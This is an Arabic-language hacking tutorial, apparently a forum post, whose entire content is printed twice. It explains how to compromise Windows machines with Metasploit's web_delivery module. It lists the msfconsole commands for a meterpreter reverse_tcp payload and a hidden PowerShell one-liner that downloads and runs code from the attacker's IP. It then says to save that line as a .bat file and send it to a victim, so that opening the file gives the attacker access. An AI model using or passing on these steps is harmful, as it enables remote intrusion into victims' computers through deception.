إختراق نظام Windows فقط
عبر Power Shell باستغلال ثغرة web_delivery
¤} ماهو Power Shell :
هو أمر أو مجموعة من الأوامر التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
¤} الأستغلال :
أولاً نقوم بتشغيل الميتاسبلويت
$ msfconsole
ثم نقوم بكتابة
$ use exploit/multi/script/web_delivery
$ show targets
الآن نختار رقم 2 وهو PSH والذي يعني Power Shell
$ set target 2
ثم نكتب الاوامر التالية
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
نكتب مكان <IP> الآيبي الخارجي اذا كان الاختراق خارجي او الآيبي الداخلي إذا كان الاختراق داخلي
ونكتب مكان <PORT> البورت ويفضل أن يكون 4444
ثم نكتب أمر
$ exploit
وننسخ
powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.1.103:8080/AcgTlVy');
مكان ( 192.168.1.103:8080 ) نضع الأي بي الخاص بنا مع البورت .
ثم نحفظه بملف بإمتداد bat ونرسله ل ضحية
وعند فتحه سيصلنا التبليغ وتم اختراق .
عبر Power Shell باستغلال ثغرة web_delivery
¤} ماهو Power Shell :
هو أمر أو مجموعة من الأوامر التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
¤} الأستغلال :
أولاً نقوم بتشغيل الميتاسبلويت
$ msfconsole
ثم نقوم بكتابة
$ use exploit/multi/script/web_delivery
$ show targets
الآن نختار رقم 2 وهو PSH والذي يعني Power Shell
$ set target 2
ثم نكتب الاوامر التالية
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
نكتب مكان <IP> الآيبي الخارجي اذا كان الاختراق خارجي او الآيبي الداخلي إذا كان الاختراق داخلي
ونكتب مكان <PORT> البورت ويفضل أن يكون 4444
ثم نكتب أمر
$ exploit
وننسخ
powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.1.103:8080/AcgTlVy');
مكان ( 192.168.1.103:8080 ) نضع الأي بي الخاص بنا مع البورت .
ثم نحفظه بملف بإمتداد bat ونرسله ل ضحية
وعند فتحه سيصلنا التبليغ وتم اختراق .